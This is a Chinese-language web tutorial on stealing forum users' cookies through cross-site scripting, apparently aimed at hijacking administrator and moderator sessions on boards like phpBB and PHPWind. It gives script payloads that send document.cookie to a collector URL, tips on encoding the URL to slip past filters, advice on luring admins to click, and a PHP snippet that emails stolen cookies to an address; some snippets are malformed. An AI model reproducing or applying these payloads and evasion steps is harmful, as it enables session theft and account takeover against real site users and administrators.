欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  web前端

XSS攻击Cookie欺骗中隐藏JavaScript执行

程序员文章站 2022-04-12 13:14:12
...
比如发现一处可XSS地方:
<script>alert(不管怎么样弹出就好)</script>

自己弄个偷cookie的文件。

目的是让其他浏览者去浏览我们设计好的陷阱
<script>document.location=http://URL.com/cookie.php?cookie=&#39;+escape(document.cookie) </script>

怎么弄其实也不用我多说了。。

现在主要说的是如何隐藏JavaScript执行。

大家可能习惯每天去milw0rm.com看EXP,

每当发布XSS漏洞的EXP,当我们利用的时候。

却无法cookie任何信息,这是为什么呢。。

像魔力,PHPBB这样大型的论坛都具备XSS漏洞。

我给的这个
<script>document.location=http://URL.com/cookie.php?cookie=&#39;+escape(document.cookie) </script>

会显示Javascript 错误。

解决办法有2种,我们可以把外部敏感信息用unicode编码

给个URL:http://www.mikezilla.com/exp0012.html

通过编码就是这样:
<script>eval(location.href="http://www.php1.cn/">
上述还不行就用第2种方法

Javascript fromCharCode中的eval功能

上面说了可以用unicode编码过一些站

比如编码后的104,116,116,112就是HTTP

如果论坛用了其他的编辑器,比如PHPWind 用的所见所得编辑器

直接打上http://url.com肯定会暴露。

那么我们就看编辑器的形式来调换URL

比如偷COOKIE的站是http://www.URL.com

我们就这样
http://www.url.com

当然显示的部分你可以替换成吸引人的信息骗取管理和斑竹的点击

用一点社会工程学就可以了。。

好了现在都完成了初步的设想,开始实现吧

第1步:管理看见我们构造好的陷阱,并且点了他

第2步:Javascript 执行成功了。。。

第3步:构造好的偷COOKIE文件偷取到Cookie

第4步:我们不可能傻到URL连接是纯文本,将URL用Unicode编码(这里习惯说是加密)http://www.mikezilla.com/exp0012.html

第5步:截取的Cookie信息当然不是明文的,我们只要使用FireFox Cookie 编辑器
替换COOKIE就OK了,或者用CookieEditor等其他工具。。

个人建议:偷取Cookie不一定就使用空间收取Cookie信息
比如构造个邮箱收取就这样
<?

mail("hackeroo@hotmail.com","cookie monster",$_REQUEST[cookie]);

?>
<html>
<script>document.location=http://www.URL.com/&#39;</script>
</html>

好了偷到有价值的信息替换Cookie就行了。。替换斑竹的就是斑竹权限,替换管理的就和是管理权限。。
相关标签: JavaScript